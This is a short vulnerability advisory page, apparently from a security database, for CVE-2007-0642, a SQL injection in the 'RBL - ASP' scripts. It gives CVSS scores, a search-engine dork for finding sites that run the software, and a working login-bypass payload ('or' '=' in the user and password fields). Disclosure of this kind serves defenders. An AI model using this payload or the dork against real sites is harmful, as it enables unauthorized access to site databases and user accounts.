Bug: RBL - ASP (scripts with db) SQL injection ( Ascii Version )

Search:
WLB2

RBL - ASP (scripts with db) SQL injection

Published
Credit
Risk
2007.02.01
sn0oPy
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-0642
No
Yes
 Dork: intitle:"RBL - ASP"

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

* RBL - ASP (scripts with db) SQL injection

* By : sn0oPy

* Risk : high

* Site : http://www.aspside.com

* Dork : intitle:"RBL - ASP"

* exploit :

user = 'or' '='
pass = 'or' '='

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net)

reference = http://forums.avenir-geopolitique.net/viewtopic.php?t=2607

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version